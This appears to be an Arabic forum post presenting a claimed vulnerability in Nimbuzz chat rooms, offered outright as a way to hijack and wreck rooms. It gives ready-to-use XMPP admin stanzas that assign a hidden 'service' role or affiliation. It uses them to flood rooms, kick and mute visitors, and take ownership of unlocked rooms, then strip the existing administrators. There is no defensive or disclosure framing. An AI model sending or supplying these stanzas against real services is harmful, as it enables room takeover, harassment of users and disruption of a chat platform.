Old school Easter eggs.
ثغرة اختراق و تخريب الغرف الان بين يدكم

الثغرة تتكون من 2 اكود خطيرة جداً جدً جداً

و الثغرة قابله للتطوير.

طبعاً الثغرة من اكتشافي وتعبي و جهدي

= ( كل الحقوق محفوظه لي انا هاجوس الجيزاني).

......................................................



نبدا في الشرح......

الجميع يعرف ان الغرف تستطيع ترشيح

owner و admin و member و none

لكن الي ما يعرفوه انو يوجد service ويستطيع

الشخص من خلاله التحكم في الاداره تحكم تااام.

...................

الكود الاول و هو عباره عن الدخول بنك وهمي و الدردشه

منه و طرد الزوار ووضع الزوار ع الصامت و فلودة الغرفه

<iq type="set" to="اسم الروم@conference.nimbuzz.com" id="mir_11"> <query xmlns="http://jabber.org/protocol/muc#admin"> <item jid="عـ»ـمري▒وضيعـ«ـت▒اكثرهـ@nimbuzz.com/;';هاجوس;';الجيزاني;';" role="service" /> </query> </iq>



مكان عـ»ـمري▒وضيعـ«ـت▒اكثرهـ@nimbuzz.com/;';هاجوس;';الجيزاني;'; تحط نكك و الريسورس

وبعد ما ترسل الكود

تستطيع الفلودة بتكرار إرسال هذا الكود



<iq type="set" to="اسم الروم@conference.nimbuzz.com" id="mir_11"> <query xmlns="http://jabber.org/protocol/muc#admin"> <item jid="؟" role="participant" /> <item jid="؟" role="none" /> <item jid="؟" role="participant" /> <item jid="؟" role="none" /> <item jid="؟" role="participant" /> <item jid="؟" role="none" /> <item jid="؟" role="participant" /> <item jid="؟" role="none" /> <item jid="؟" role="participant" /> <item jid="؟" role="none" /> <item jid="؟" role="participant" /> <item jid="؟" role="none" /> <item jid="؟" role="participant" /> <item jid="؟" role="none" /> <item jid="؟" role="participant" /> <item jid="؟" role="none" /> <item jid="؟" role="participant" /> <item jid="؟" role="none" /> <item jid="؟" role="participant" /> <item jid="؟" role="none" /> <item jid="؟" role="participant" /> <item jid="؟" role="none" /> <item jid="؟" role="participant" /> <item jid="؟" role="none" /> <item jid="؟" role="participant" /> <item jid="؟" role="none" /> <item jid="؟" role="participant" /> <item jid="؟" role="none" /> <item jid="؟" role="participant" /> <item jid="؟" role="none" /> <item jid="؟" role="participant" /> <item jid="؟" role="none" /> <item jid="؟" role="participant" /> <item jid="؟" role="none" /> <item jid="؟" role="participant" /> <item jid="؟" role="none" /> </query> </iq>





و هذا كود لطرد الزوار

<iq type="set" to="هاجوس_الجيزاني@conference.nimbuzz.com" id="mir_15"> <query xmlns="http://jabber.org/protocol/muc#admin"> <item nick="عـ»ـمري▒وضيعـ«ـت▒اكثرهـ" role="none" /> </query> </iq>

مكان عـ»ـمري▒وضيعـ«ـت▒اكثرهـ ضع اسم المستخدم اللذي تريد طرده

اوك تمام انتهينا من شرح null

........................................

الان ثغرة اختراق الغرف الغير مثبته

نقوم ب ارسال هذا الكود ل النك الثاني

<iq type="set" to="هاجوس_الجيزاني@conference.nimbuzz.com" id="mir_15"> <query xmlns="http://jabber.org/protocol/muc#admin"> <item jid="هاجوس~الجيزاني2@nimbuzz.com" affiliation="service" /> </query> </iq>

وبعد ارسال الكود نذهب ل النك الثاني و نرسل هذا الكود

لترشيح النك الاول owner

<iq type="set" to="هاجوس_الجيزاني@conference.nimbuzz.com" id="mir_15"> <query xmlns="http://jabber.org/protocol/muc#admin"> <item jid="هاجوس~الجيزاني1@nimbuzz.com" affiliation="owner" /> </query> </iq>



تهانينا لقد تم اختراق الغرفه الان كل ما عليك هو حذف الاداره

الموجوده ع الغرفه و من بعدها ترشيح النك رقم 2 الي رشحناه

service و نمنحه owner و بعدها none ومن ثم نعيد تثبيت الغرفه

و الف مبروك لقد تم اختراق الغرفه بنجاح...